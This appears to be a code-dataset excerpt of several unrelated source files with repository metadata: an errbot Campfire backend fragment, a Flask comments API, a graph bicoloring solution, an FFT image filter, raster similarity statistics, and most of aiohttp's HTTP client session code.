return self.conn
def build_message(self, text):
return Message(text, type_='groupchat') # it is always a groupchat in campfire
def shutdown(self):
super(CampfireBackend, self).shutdown()
def msg_callback(self, message):
log.debug('Incoming message [%s]' % message)
user = ""
if message.user:
user = message.user.name
if message.is_text():
msg = Message(message.body, type_='groupchat') # it is always a groupchat in campfire
msg.frm = CampfireIdentifier(user)
msg.to = self.bot_identifier # assume it is for me
self.callback_message(msg)
def error_callback(self, error, room):
log.error("Stream STOPPED due to ERROR: %s in room %s" % (error, room))
self.exit_lock.acquire()
self.exit_lock.notify()
self.exit_lock.release()
def join_room(self, room, username=None, password=None):
self.conn.join_room(room, self.msg_callback, self.error_callback)
def build_message(self, text):
return build_message(text, Message)
def build_identifier(self, strrep):
return CampfireIdentifier(strrep)
def send_simple_reply(self, mess, text, private=False):
"""Total hack to avoid stripping of rooms"""
self.send_message(self.build_reply(mess, text, True))
@property
def mode(self):
return 'campfire'
def groupchat_reply_format(self):
return '@{0} {1}'
|
gpl-3.0
| -7,363,828,428,747,781,000 | 32.7 | 98 | 0.632276 | false | 3.897687 | true | false | false |
EOOOL/flaskq
|
app/api_1_0/comments.py
|
1
|
2405
|
from flask import jsonify, request, g, url_for, current_app
from .. import db
from ..models import Post, Permission, Comment
from . import api
from .decorators import permission_required
@api.route('/comments/')
def get_comments():
page = request.args.get('page', 1, type=int)
pagination = Comment.query.order_by(Comment.timestamp.desc()).paginate(
page, per_page=current_app.config['FLASKY_COMMENTS_PER_PAGE'],
error_out=False)
comments = pagination.items
prev = None
if pagination.has_prev:
prev = url_for('api.get_comments', page=page-1, _external=True)
next = None
if pagination.has_next:
next = url_for('api.get_comments', page=page+1, _external=True)
return jsonify({
'comments': [comment.to_json() for comment in comments],
'prev': prev,
'next': next,
'count': pagination.total
})
@api.route('/comments/<int:id>')
def get_comment(id):
comment = Comment.query.get_or_404(id)
return jsonify(comment.to_json())
@api.route('/posts/<int:id>/comments/')
def get_post_comments(id):
post = Post.query.get_or_404(id)
page = request.args.get('page', 1, type=int)
pagination = post.comments.order_by(Comment.timestamp.asc()).paginate(
page, per_page=current_app.config['FLASKY_COMMENTS_PER_PAGE'],
error_out=False)
comments = pagination.items
prev = None
if pagination.has_prev:
prev = url_for('api.get_post_comments', id=id, page=page-1,
_external=True)
next = None
if pagination.has_next:
next = url_for('api.get_post_comments', id=id, page=page+1,
_external=True)
return jsonify({
'comments': [comment.to_json() for comment in comments],
'prev': prev,
'next': next,
'count': pagination.total
})
@api.route('/posts/<int:id>/comments/', methods=['POST'])
@permission_required(Permission.COMMENT)
def new_post_comment(id):
post = Post.query.get_or_404(id)
comment = Comment.from_json(request.json)
comment.author = g.current_user
comment.post = post
db.session.add(comment)
db.session.commit()
return jsonify(comment.to_json()), 201, \
{'Location': url_for('api.get_comment', id=comment.id,
_external=True)}
|
mit
| 1,175,486,497,100,385,800 | 32.357143 | 75 | 0.607484 | false | 3.526393 | false | false | false |
secnot/uva-onlinejudge-solutions
|
10004 - Bicoloring/main.py
|
1
|
1734
|
import sys
from collections import deque
def load_num():
num_str = sys.stdin.readline()
if num_str == '\n' or num_str=='':
return None
return list(map(int, num_str.rstrip().split()))
def load_graph():
"""Load graph into its adjacency list"""
vertices = load_num()[0]
# Check it is a valid graph and not the end of the file
if vertices==0:
return None
# Load each edge an construct adjcency list
edges = load_num()[0]
adjList = [list() for v in range(vertices)]
for i in range(edges):
s, e = load_num()
adjList[s].append(e)
adjList[e].append(s)
return adjList
def is_bicolored(adjList):
"""Use BFS, when the edges of a vertex are processed:
* If the vertex found is new assign a color opposite to current.
* If the vertex was already processed and has same color to current
the graph is not bicolored
"""
vertices = len(adjList)
discovered = [False for x in range(vertices)]
processed = [False for x in range(vertices)]
color = [-1 for x in range(vertices)]
q = deque([0])
color[0] = 0
while q:
v = q.popleft()
processed[v] = True
for n in adjList[v]:
if not discovered[n]:
discovered[n] = True
color[n] = 0 if color[v] else 1
q.append(n)
elif color[n]==color[v]:
return False
return True
if __name__ == '__main__':
while True:
adj = load_graph()
if not adj:
break
if is_bicolored(adj):
print("BICOLORABLE.")
else:
print("NOT BICOLORABLE.")
exit(0)
|
mit
| -2,551,883,087,197,521,400 | 20.949367 | 76 | 0.544983 | false | 3.802632 | false | false | false |
beremaran/cbu-cse3113
|
hw07.py
|
1
|
2388
|
#!/usr/bin/env python
import argparse
import numpy as np
from PIL import Image
'''
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
'''
Berke Emrecan Arslan <[email protected]>
140315025
Faculty of Engineering, Computer Science & Engineering
Manisa Celal Bayar University
Taken from;
https://github.com/beremaran/cbu-cse3113
'''
def im_load(img_path):
im = Image.open(img_path)
im = im.convert('L')
return np.asarray(im, dtype=np.uint8)
def im_center(im):
return np.asarray(im.shape) / 2
def im_r(im, coordinates=(0, 0)):
return np.linalg.norm(im_center(im) - coordinates)
def im_r_max(im):
return im_r(im, np.zeros((2,)))
def im_filter(im, filter_type, filter_gain):
r = im_r_max(im) * filter_gain
center = im_center(im)
y, x = np.ogrid[:im.shape[0], :im.shape[1]]
k = 1 if filter_type == "lowpass" else -1
return -1 * k * np.sqrt((y - center[0]) ** 2 + (x - center[1]) ** 2) >= r * k * -1
def run(img_path, filter_type="lowpass", filter_gain=0.1):
im = im_load(img_path)
f = np.fft.fft2(im)
f = np.fft.fftshift(f)
f[~im_filter(f, filter_type, filter_gain)] = 1
f = np.fft.ifftshift(f)
f = np.fft.ifft2(f)
f = abs(f)
Image.fromarray(f.astype(np.uint8)).save("140315025HW07.png", "PNG")
if __name__ == "__main__":
argparser = argparse.ArgumentParser("140315025HW07.py", description="Low-pass or high-pass filtering for images")
argparser.add_argument("image_path", help="Image to be filtered")
argparser.add_argument("filter_type", choices=["lowpass", "highpass"], help="Filter type")
argparser.add_argument("gain", type=float, help="Filter's gain")
args = argparser.parse_args()
run(args.image_path, args.filter_type, args.gain)
|
gpl-3.0
| -3,285,391,032,930,099,700 | 27.771084 | 117 | 0.664154 | false | 3.15873 | false | false | false |
VUEG/bdes_to
|
src/03_post_processing/similarity.py
|
1
|
18175
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Functions and utilities comparing raster and vector similarities.
Module can be used alone or as part of Snakemake workflow.
"""
import logging
import rasterio
import geopandas as gpd
import pandas as pd
import numpy as np
import numpy.ma as ma
from importlib.machinery import SourceFileLoader
from scipy.spatial.distance import jaccard
from scipy.stats import kendalltau
from timeit import default_timer as timer
utils = SourceFileLoader("lib.utils", "src/00_lib/utils.py").load_module()
def compute_jaccard(x, y, x_min=0.0, x_max=1.0, y_min=0.0, y_max=1.0,
warn_uneven=True, limit_tolerance=4, disable_checks=False):
"""Calculate the Jaccard index (Jaccard similarity coefficient).
The Jaccard coefficient measures similarity between sample sets, and is
defined as the size of the intersection divided by the size of the union of
the sample sets. The Jaccard coefficient can be calculated for a subset of
rasters provided by using the threshold argument.
Min and max values must be provided for both RasterLayer objects x
and y. Method can be used with RasterLayers of any value range, but
the defaults [0.0, 1.0] are geared towards comparing Zonation rank priority
rasters. Limits provided are inclusive.
:param x ndarray object.
:param y ndarray object.
:param x_min Numeric minimum threshold value for x to be used
(default 0.0).
:param x_max Numeric maximum threshold value for x to be used
(default 1.0).
:param y_min Numeric minimum threshold value for y to be used
(default 0.0).
:param y_max Numeric maximum threshold value for y to be used
(default 1.0).
:param warn_uneven Boolean indicating whether a warning is raised if the
compared raster coverages are very (>20x) uneven.
:param limit_tolerance integer values that defines to which precision x and
y limits are rounded to. This helps e.g. with values
that close to 0 but not quite 0 (default: 4, i.e.
round(x, 4)).
:param disable_checks boolean indicating if the input limit values are
checked against the actual raster values in x and y.
:return numeric value in [0, 1].
"""
if not disable_checks:
assert x_min >= np.round(np.min(x), limit_tolerance), "Min threshold smaller than computed min of x"
assert x_max <= np.round(np.max(x), limit_tolerance), "Max threshold greater than computed max of x"
assert x_min < x_max, "Min threshold for x larger to max threshold"
assert y_min >= np.round(np.min(y), limit_tolerance), "Min threshold smaller than computed min of y"
assert y_max <= np.round(np.max(y), limit_tolerance), "Max threshold greater than computed max of y"
assert y_min < y_max, "Min threshold for y larger to max threshold"
# Get the values according to the limits provided
x_bin = (x >= x_min) & (x <= x_max)
y_bin = (y >= y_min) & (y <= y_max)
if warn_uneven:
x_size = np.sum(x_bin)
y_size = np.sum(y_bin)
# Sort from smaller to larger
sizes = np.sort([x_size, y_size])
if sizes[1] / sizes[0] > 20:
print("WARNING: The extents of raster values above the "
"threshhold differ more than 20-fold: Jaccard coefficient " +
"may not be informative.")
# Compute the Jaccard-Needham dissimilarity between two boolean 1-D arrays
# and subtract from 1 to get the Jaccard index
return 1 - jaccard(x_bin.flatten(), y_bin.flatten())
def cross_correlation(input_rasters, verbose=False, logger=None):
""" Calculate Kendall tau rank correlation between all the inpur rasters.
Input rasters are read in as masked arrays and all cells that are NoData
are discarded. This way, only the values of informative cells are passed
on to scipy.stats.kendalltau() which makes things faster. The assumption is
that all rasters exactly match on which cells have values. An intersection
of both rasters' masks is used to define informative cells.
:param input_rasters list of input raster paths.
:param verbose: Boolean indicating how much information is printed out.
:param logger: logger object to be used.
:return Pandas Dataframe with rank correlation information.
"""
# 1. Setup --------------------------------------------------------------
all_start = timer()
if not logger:
logging.basicConfig()
llogger = logging.getLogger('cross_correlation')
llogger.setLevel(logging.DEBUG if verbose else logging.INFO)
else:
llogger = logger
# Check the inputs
assert len(input_rasters) > 1, "More than one input rasters are needed"
# 2. Calculations --------------------------------------------------------
llogger.info(" [** COMPUTING KENDALL TAU RANK CORRELATIONS **]")
all_correlations = pd.DataFrame({"feature1": [], "feature2": [],
"tau": [], "pvalue": []})
n_rasters = len(input_rasters)
# Generate counter information for all the computations. The results
# matrix is always diagonally symmetrical.
n_computations = int((n_rasters * n_rasters - n_rasters) / 2)
no_computation = 1
for i in range(0, n_rasters):
raster1 = rasterio.open(input_rasters[i])
raster1_src = raster1.read(1, masked=True)
for j in range(i+1, n_rasters):
raster2 = rasterio.open(input_rasters[j])
raster2_src = raster2.read(1, masked=True)
# Compute the intersection of the masks of both rasters and use
# that as a value mask.
value_mask = raster1_src.mask & raster2_src.mask
# Then set the mask of both raster to the intersection mask
raster1_src.mask = value_mask
raster2_src.mask = value_mask
# Inlude only cells with actual values
raster1_values = ma.compressed(raster1_src)
raster2_values = ma.compressed(raster2_src)
prefix = utils.get_iteration_prefix(no_computation,
n_computations)
llogger.info(("{} Calculating correlation ".format(prefix) +
"between {} ".format(input_rasters[i]) +
"and {}".format(input_rasters[j])))
# Compute Kendall's tau rank correlation
tau, pvalue = kendalltau(raster1_values, raster2_values)
llogger.debug("Tau: {0} (p-value: {1})".format(tau, pvalue))
correlations = pd.DataFrame({"feature1": [input_rasters[i]],
"feature2": [input_rasters[j]],
"tau": [tau],
"pvalue": [pvalue]})
all_correlations = pd.concat([all_correlations, correlations])
no_computation += 1
all_correlations.index = np.arange(0, len(all_correlations.index), 1)
all_end = timer()
all_elapsed = round(all_end - all_start, 2)
llogger.info(" [TIME] All processing took {} sec".format(all_elapsed))
return all_correlations
def cross_jaccard(input_rasters, thresholds, verbose=False, logger=None):
""" Calculate Jaccard coefficients between all the inpur rasters.
This is a utility function that is intented to be used to compare
fractions of the landscape.
:param input_rasters list of input raster paths.
:param thresholds vector of numeric tuples (x_min, x_max, y_min, y_max) values of thresholds.
:param verbose: Boolean indicating how much information is printed out.
:param logger: logger object to be used.
:param ... additional arguments passed on to jaccard().
:return Pandas Dataframe with Jaccard coefficients between all rasters.
"""
# 1. Setup --------------------------------------------------------------
all_start = timer()
if not logger:
logging.basicConfig()
llogger = logging.getLogger('cross_jaccard')
llogger.setLevel(logging.DEBUG if verbose else logging.INFO)
else:
llogger = logger
# Check the inputs
assert len(input_rasters) > 1, "More than one input rasters are needed"
assert len(thresholds) >= 1, "At least one tuple of thresholds is needed"
# 2. Calculations --------------------------------------------------------
llogger.info(" [** COMPUTING JACCARD INDICES **]")
all_jaccards = pd.DataFrame({"feature1": [], "feature2": [],
"threshold": [], "coef": []})
n_rasters = len(input_rasters)
# Generate counter information for all the computations. The results
# matrix is always diagonally symmetrical.
n_computations = int((n_rasters * n_rasters - n_rasters) / 2 * len(thresholds))
no_computation = 1
for threshold in thresholds:
if len(threshold) != 4:
llogger.error("Threshold tuple needs 4 values")
next
for i in range(0, n_rasters):
x_min, x_max, y_min, y_max = threshold
raster1 = rasterio.open(input_rasters[i])
# To calculate the Jaccard index we are dealing with binary data
# only. Avoid using masked arrays and replace NoData values with
# zeros.
raster1_nodata = raster1.nodata
raster1_src = raster1.read(1)
np.place(raster1_src, np.isclose(raster1_src, raster1_nodata), 0.0)
for j in range(i+1, n_rasters):
raster2 = rasterio.open(input_rasters[j])
raster2_nodata = raster2.nodata
raster2_src = raster2.read(1)
np.place(raster2_src, np.isclose(raster2_src, raster2_nodata),
0.0)
prefix = utils.get_iteration_prefix(no_computation,
n_computations)
llogger.info(("{} Calculating Jaccard ".format(prefix) +
"index for [{0}, {1}] ".format(x_min, x_max) +
"in {} ".format(input_rasters[i]) +
"and, [{0}, {1}] ".format(y_min, y_max) +
"in {}".format(input_rasters[j])))
coef = compute_jaccard(raster1_src, raster2_src,
x_min=x_min, x_max=x_max,
y_min=y_min, y_max=y_max)
jaccards = pd.DataFrame({"feature1": [input_rasters[i]],
"feature2": [input_rasters[j]],
"threshold": [threshold],
"coef": [coef]})
all_jaccards = pd.concat([all_jaccards, jaccards])
no_computation += 1
all_jaccards.index = np.arange(0, len(all_jaccards.index), 1)
all_end = timer()
all_elapsed = round(all_end - all_start, 2)
llogger.info(" [TIME] All processing took {} sec".format(all_elapsed))
return all_jaccards
def compute_mcs(a, b):
""" Compute MCS between vectors a and b.
:param a numeric vector.
:param b numeric vector.
:return ndarray of computed MCS scores.
"""
assert len(a) == len(b), "Vectors a and b must be of same length"
N = len(a)
# Create an array filled with -1s to store the MCS.
mcs = 0
nans = False
for i in range(0, N):
if np.isnan(a[i]) or np.isnan(b[i]):
nans = True
else:
# If eiher a or b is 0, do nothing as division would fail
if a[i] == 0.0 or b[i] == 0.0:
pass
else:
abs_subs = np.abs(a[i] - b[i]) / np.max([a[i], b[i]])
mcs += abs_subs
if nans:
print("WARNING: a and/or b contain NaNs")
return mcs / N
def cross_mcs(input_vectors, value_fields, verbose=False, logger=None):
""" Compute map comparison statistics between input vector features.
MCS (Map Comparison Statistic) indicates the average difference between any
pair of feature polygon values, expressed as a fraction of the highest
value. MCS is calculated between each polygon in the input vector features
and it is required (and checked) that all the inputs are based on the
same vector feature.
For another application of MCS, see:
Schulp, C. J. E., Burkhard, B., Maes, J., Van Vliet, J., & Verburg, P. H.
(2014). Uncertainties in Ecosystem Service Maps: A Comparison on the
European Scale. PLoS ONE, 9(10), e109643.
http://doi.org/10.1371/journal.pone.0109643
:param input_vectors list of input vector paths.
:param value_field list of String names indicating which fields contains
the values to be compared.
:param verbose: Boolean indicating how much information is printed out.
:param logger: logger object to be used.
:return list of GeoPandas Dataframe with MCS between all rasters in field
"mcs".
"""
# 1. Setup --------------------------------------------------------------
all_start = timer()
if not logger:
logging.basicConfig()
llogger = logging.getLogger('cross_mcs')
llogger.setLevel(logging.DEBUG if verbose else logging.INFO)
else:
llogger = logger
# Check the inputs
assert len(input_vectors) > 1, "More than one input vector needed"
assert len(value_fields) == len(input_vectors), "One value field per vector feature needed"
# 2. Calculations --------------------------------------------------------
llogger.info(" [** COMPUTING MCS SCORES **]")
all_mcs = pd.DataFrame({"feature1": [], "feature2": [],
"mcs": []})
n_vectors = len(input_vectors)
# Generate counter information for all the computations. The results
# matrix is always diagonally symmetrical.
n_computations = int((n_vectors * n_vectors - n_vectors) / 2)
no_computation = 1
for i in range(0, n_vectors):
# Read in the data as a GeoPandas dataframe
vector1_path = input_vectors[i]
vector1 = gpd.read_file(vector1_path)
for j in range(i+1, n_vectors):
vector2_path = input_vectors[j]
vector2 = gpd.read_file(vector2_path)
prefix = utils.get_iteration_prefix(no_computation,
n_computations)
llogger.info(("{} Calculating MCS ".format(prefix) +
"between {} ".format(vector1_path) +
"and {}".format(vector2_path)))
a = vector1[value_fields[i]]
b = vector2[value_fields[j]]
mcs_value = compute_mcs(a, b)
mcs = pd.DataFrame({"feature1": [vector1_path],
"feature2": [vector2_path],
"mcs": [mcs_value]})
all_mcs = pd.concat([all_mcs, mcs])
no_computation += 1
all_mcs.index = np.arange(0, len(all_mcs.index), 1)
all_end = timer()
all_elapsed = round(all_end - all_start, 2)
llogger.info(" [TIME] All processing took {} sec".format(all_elapsed))
return all_mcs
def plu_variation(input_files, input_codes, logger=None):
""" Compute per planning unit (PLU) variation statistics.
Given a list of input features describing the same planinng units,
calculate statistics based on defined field names.
:param input_files: String list of paths to input (vector) features.
:param input_codes: String list of field names corresponding to each
input feature. The statistics will calculated based on
these fields.
:param logger: Logger object.
:return: GeoPandas DataFrame object.
"""
# Set up logging
if not logger:
logging.basicConfig()
llogger = logging.getLogger('plu_variation')
llogger.setLevel(logging.INFO)
else:
llogger = logger
n_features = len(input_files)
# Create an empty DataFrame to store the rank priority cols
rank_values = pd.DataFrame({'NUTS_ID': []})
llogger.info("[1/2] Reading in {} features...".format(n_features))
for i, feature_file in enumerate(input_files):
feature_code = input_codes[i]
prefix = utils.get_iteration_prefix(i+1, n_features)
llogger.debug("{0} Processing feature {1}".format(prefix,
feature_file))
# Read in the feature as GeoPandas dataframe
feat_data = gpd.read_file(feature_file)
# Two different field names are used to store the mean rank
# information: "_mean" for geojson-files and 'Men_rnk' for
# shapefiles. Figure out which is currently used.
if '_mean' in feat_data.columns:
mean_field = '_mean'
elif 'Men_rnk' in feat_data.columns:
mean_field = 'Men_rnk'
else:
llogger.error("Field '_mean' or 'Men_rnk' not found")
raise ValueError
# On first iteration, also get the NUTS_ID column
if i == 1:
rank_values['NUTS_ID'] = feat_data['NUTS_ID']
# Get the rank priority column and place if the store DataFrame
rank_values[feature_code] = feat_data[mean_field]
llogger.info("[2/2] Calculating mean and STD...")
# Read in the first input feature to act as a template.
output_feature = gpd.read_file(input_files[0])
# Only take one field: NUTS_ID
output_feature = output_feature[['geometry', 'NUTS_ID']]
# Merge with the collected data
output_feature = output_feature.merge(rank_values, on='NUTS_ID')
# Calculate mean
agg_means = output_feature.mean(1)
# Calculate STD
agg_stds = output_feature.std(1)
output_feature['agg_mean'] = agg_means
output_feature['agg_std'] = agg_stds
return output_feature
|
mit
| -3,889,173,436,250,582,000 | 41.169374 | 108 | 0.592737 | false | 3.941661 | false | false | false |
jashandeep-sohi/aiohttp
|
aiohttp/client.py
|
1
|
25360
|
"""HTTP Client for asyncio."""
import asyncio
import base64
import hashlib
import os
import sys
import traceback
import warnings
import http.cookies
import urllib.parse
import aiohttp
from .client_reqrep import ClientRequest, ClientResponse
from .errors import WSServerHandshakeError
from .multidict import MultiDictProxy, MultiDict, CIMultiDict, upstr
from .websocket import WS_KEY, WebSocketParser, WebSocketWriter
from .websocket_client import ClientWebSocketResponse
from . import hdrs
__all__ = ('ClientSession', 'request', 'get', 'options', 'head',
'delete', 'post', 'put', 'patch', 'ws_connect')
PY_35 = sys.version_info >= (3, 5)
class ClientSession:
"""First-class interface for making HTTP requests."""
_source_traceback = None
_connector = None
def __init__(self, *, connector=None, loop=None, cookies=None,
headers=None, skip_auto_headers=None,
auth=None, request_class=ClientRequest,
response_class=ClientResponse,
ws_response_class=ClientWebSocketResponse,
version=aiohttp.HttpVersion11):
if connector is None:
connector = aiohttp.TCPConnector(loop=loop)
loop = connector._loop # never None
else:
if loop is None:
loop = connector._loop # never None
elif connector._loop is not loop:
raise ValueError("loop argument must agree with connector")
self._loop = loop
if loop.get_debug():
self._source_traceback = traceback.extract_stack(sys._getframe(1))
self._cookies = http.cookies.SimpleCookie()
# For Backward compatability with `share_cookies` connectors
if connector._share_cookies:
self._update_cookies(connector.cookies)
if cookies is not None:
self._update_cookies(cookies)
self._connector = connector
self._default_auth = auth
self._version = version
# Convert to list of tuples
if headers:
headers = CIMultiDict(headers)
else:
headers = CIMultiDict()
self._default_headers = headers
if skip_auto_headers is not None:
self._skip_auto_headers = frozenset([upstr(i)
for i in skip_auto_headers])
else:
self._skip_auto_headers = frozenset()
self._request_class = request_class
self._response_class = response_class
self._ws_response_class = ws_response_class
def __del__(self, _warnings=warnings):
if not self.closed:
self.close()
_warnings.warn("Unclosed client session {!r}".format(self),
ResourceWarning)
context = {'client_session': self,
'message': 'Unclosed client session'}
if self._source_traceback is not None:
context['source_traceback'] = self._source_traceback
self._loop.call_exception_handler(context)
def request(self, method, url, *,
params=None,
data=None,
headers=None,
skip_auto_headers=None,
auth=None,
allow_redirects=True,
max_redirects=10,
encoding='utf-8',
version=None,
compress=None,
chunked=None,
expect100=False,
read_until_eof=True):
"""Perform HTTP request."""
return _RequestContextManager(
self._request(
method,
url,
params=params,
data=data,
headers=headers,
skip_auto_headers=skip_auto_headers,
auth=auth,
allow_redirects=allow_redirects,
max_redirects=max_redirects,
encoding=encoding,
version=version,
compress=compress,
chunked=chunked,
expect100=expect100,
read_until_eof=read_until_eof))
@asyncio.coroutine
def _request(self, method, url, *,
params=None,
data=None,
headers=None,
skip_auto_headers=None,
auth=None,
allow_redirects=True,
max_redirects=10,
encoding='utf-8',
version=None,
compress=None,
chunked=None,
expect100=False,
read_until_eof=True):
if version is not None:
warnings.warn("HTTP version should be specified "
"by ClientSession constructor", DeprecationWarning)
else:
version = self._version
if self.closed:
raise RuntimeError('Session is closed')
redirects = 0
history = []
if not isinstance(method, upstr):
method = upstr(method)
# Merge with default headers and transform to CIMultiDict
headers = self._prepare_headers(headers)
if auth is None:
auth = self._default_auth
# It would be confusing if we support explicit Authorization header
# with `auth` argument
if (headers is not None and
auth is not None and
hdrs.AUTHORIZATION in headers):
raise ValueError("Can't combine `Authorization` header with "
"`auth` argument")
skip_headers = set(self._skip_auto_headers)
if skip_auto_headers is not None:
for i in skip_auto_headers:
skip_headers.add(upstr(i))
while True:
req = self._request_class(
method, url, params=params, headers=headers,
skip_auto_headers=skip_headers, data=data,
cookies=self.cookies, encoding=encoding,
auth=auth, version=version, compress=compress, chunked=chunked,
expect100=expect100,
loop=self._loop, response_class=self._response_class)
conn = yield from self._connector.connect(req)
try:
resp = req.send(conn.writer, conn.reader)
try:
yield from resp.start(conn, read_until_eof)
except:
resp.close()
conn.close()
raise
except (aiohttp.HttpProcessingError,
aiohttp.ServerDisconnectedError) as exc:
raise aiohttp.ClientResponseError() from exc
except OSError as exc:
raise aiohttp.ClientOSError(*exc.args) from exc
self._update_cookies(resp.cookies)
# For Backward compatability with `share_cookie` connectors
if self._connector._share_cookies:
self._connector.update_cookies(resp.cookies)
# redirects
if resp.status in (301, 302, 303, 307) and allow_redirects:
redirects += 1
history.append(resp)
if max_redirects and redirects >= max_redirects:
resp.close()
break
else:
# TODO: close the connection if BODY is large enough
# Redirect with big BODY is forbidden by HTTP protocol
# but malformed server may send illegal response.
# Small BODIES with text like "Not Found" are still
# perfectly fine and should be accepted.
yield from resp.release()
# For 301 and 302, mimic IE behaviour, now changed in RFC.
# Details: https://github.com/kennethreitz/requests/pull/269
if resp.status != 307:
method = hdrs.METH_GET
data = None
if headers.get(hdrs.CONTENT_LENGTH):
headers.pop(hdrs.CONTENT_LENGTH)
r_url = (resp.headers.get(hdrs.LOCATION) or
resp.headers.get(hdrs.URI))
scheme = urllib.parse.urlsplit(r_url)[0]
if scheme not in ('http', 'https', ''):
resp.close()
raise ValueError('Can redirect only to http or https')
elif not scheme:
r_url = urllib.parse.urljoin(url, r_url)
url = r_url
yield from resp.release()
continue
break
resp._history = tuple(history)
return resp
def ws_connect(self, url, *,
protocols=(),
timeout=10.0,
autoclose=True,
autoping=True,
auth=None,
origin=None):
"""Initiate websocket connection."""
return _WSRequestContextManager(
self._ws_connect(url,
protocols=protocols,
timeout=timeout,
autoclose=autoclose,
autoping=autoping,
auth=auth,
origin=origin))
@asyncio.coroutine
def _ws_connect(self, url, *,
protocols=(),
timeout=10.0,
autoclose=True,
autoping=True,
auth=None,
origin=None):
sec_key = base64.b64encode(os.urandom(16))
headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_VERSION: '13',
hdrs.SEC_WEBSOCKET_KEY: sec_key.decode(),
}
if protocols:
headers[hdrs.SEC_WEBSOCKET_PROTOCOL] = ','.join(protocols)
if origin is not None:
headers[hdrs.ORIGIN] = origin
# send request
resp = yield from self.get(url, headers=headers,
read_until_eof=False,
auth=auth)
try:
# check handshake
if resp.status != 101:
raise WSServerHandshakeError(
message='Invalid response status',
code=resp.status,
headers=resp.headers)
if resp.headers.get(hdrs.UPGRADE, '').lower() != 'websocket':
raise WSServerHandshakeError(
message='Invalid upgrade header',
code=resp.status,
headers=resp.headers)
if resp.headers.get(hdrs.CONNECTION, '').lower() != 'upgrade':
raise WSServerHandshakeError(
message='Invalid connection header',
code=resp.status,
headers=resp.headers)
# key calculation
key = resp.headers.get(hdrs.SEC_WEBSOCKET_ACCEPT, '')
match = base64.b64encode(
hashlib.sha1(sec_key + WS_KEY).digest()).decode()
if key != match:
raise WSServerHandshakeError(
message='Invalid challenge response',
code=resp.status,
headers=resp.headers)
# websocket protocol
protocol = None
if protocols and hdrs.SEC_WEBSOCKET_PROTOCOL in resp.headers:
resp_protocols = [
proto.strip() for proto in
resp.headers[hdrs.SEC_WEBSOCKET_PROTOCOL].split(',')]
for proto in resp_protocols:
if proto in protocols:
protocol = proto
break
reader = resp.connection.reader.set_parser(WebSocketParser)
resp.connection.writer.set_tcp_nodelay(True)
writer = WebSocketWriter(resp.connection.writer, use_mask=True)
except Exception:
resp.close()
raise
else:
return self._ws_response_class(reader,
writer,
protocol,
resp,
timeout,
autoclose,
autoping,
self._loop)
def _update_cookies(self, cookies):
"""Update shared cookies."""
if isinstance(cookies, dict):
cookies = cookies.items()
for name, value in cookies:
if isinstance(value, http.cookies.Morsel):
# use dict method because SimpleCookie class modifies value
# before Python 3.4
dict.__setitem__(self.cookies, name, value)
else:
self.cookies[name] = value
def _prepare_headers(self, headers):
""" Add default headers and transform it to CIMultiDict
"""
# Convert headers to MultiDict
result = CIMultiDict(self._default_headers)
if headers:
if not isinstance(headers, (MultiDictProxy, MultiDict)):
headers = CIMultiDict(headers)
added_names = set()
for key, value in headers.items():
if key in added_names:
result.add(key, value)
else:
result[key] = value
added_names.add(key)
return result
def get(self, url, *, allow_redirects=True, **kwargs):
"""Perform HTTP GET request."""
return _RequestContextManager(
self._request(hdrs.METH_GET, url,
allow_redirects=allow_redirects,
**kwargs))
def options(self, url, *, allow_redirects=True, **kwargs):
"""Perform HTTP OPTIONS request."""
return _RequestContextManager(
self._request(hdrs.METH_OPTIONS, url,
allow_redirects=allow_redirects,
**kwargs))
def head(self, url, *, allow_redirects=False, **kwargs):
"""Perform HTTP HEAD request."""
return _RequestContextManager(
self._request(hdrs.METH_HEAD, url,
allow_redirects=allow_redirects,
**kwargs))
def post(self, url, *, data=None, **kwargs):
"""Perform HTTP POST request."""
return _RequestContextManager(
self._request(hdrs.METH_POST, url,
data=data,
**kwargs))
def put(self, url, *, data=None, **kwargs):
"""Perform HTTP PUT request."""
return _RequestContextManager(
self._request(hdrs.METH_PUT, url,
data=data,
**kwargs))
def patch(self, url, *, data=None, **kwargs):
"""Perform HTTP PATCH request."""
return _RequestContextManager(
self._request(hdrs.METH_PATCH, url,
data=data,
**kwargs))
def delete(self, url, **kwargs):
"""Perform HTTP DELETE request."""
return _RequestContextManager(
self._request(hdrs.METH_DELETE, url,
**kwargs))
def close(self):
"""Close underlying connector.
Release all acquired resources.
"""
if not self.closed:
self._connector.close()
self._connector = None
ret = asyncio.Future(loop=self._loop)
ret.set_result(None)
return ret
@property
def closed(self):
"""Is client session closed.
A readonly property.
"""
return self._connector is None or self._connector.closed
@property
def connector(self):
"""Connector instance used for the session."""
return self._connector
@property
def cookies(self):
"""The session cookies."""
return self._cookies
@property
def version(self):
"""The session HTTP protocol version."""
return self._version
def detach(self):
"""Detach connector from session without closing the former.
Session is switched to closed state anyway.
"""
self._connector = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
if PY_35:
@asyncio.coroutine
def __aenter__(self):
return self
@asyncio.coroutine
def __aexit__(self, exc_type, exc_val, exc_tb):
yield from self.close()
if PY_35:
from collections.abc import Coroutine
base = Coroutine
else:
base = object
class _BaseRequestContextManager(base):
__slots__ = ('_coro', '_resp')
def __init__(self, coro):
self._coro = coro
self._resp = None
def send(self, value):
return self._coro.send(value)
def throw(self, typ, val=None, tb=None):
if val is None:
return self._coro.throw(typ)
elif tb is None:
return self._coro.throw(typ, val)
else:
return self._coro.throw(typ, val, tb)
def close(self):
return self._coro.close()
@property
def gi_frame(self):
return self._coro.gi_frame
@property
def gi_running(self):
return self._coro.gi_running
@property
def gi_code(self):
return self._coro.gi_code
def __next__(self):
return self.send(None)
@asyncio.coroutine
def __iter__(self):
resp = yield from self._coro
return resp
if PY_35:
def __await__(self):
resp = yield from self._coro
return resp
@asyncio.coroutine
def __aenter__(self):
self._resp = yield from self._coro
return self._resp
if not PY_35:
try:
from asyncio import coroutines
coroutines._COROUTINE_TYPES += (_BaseRequestContextManager,)
except:
pass
class _RequestContextManager(_BaseRequestContextManager):
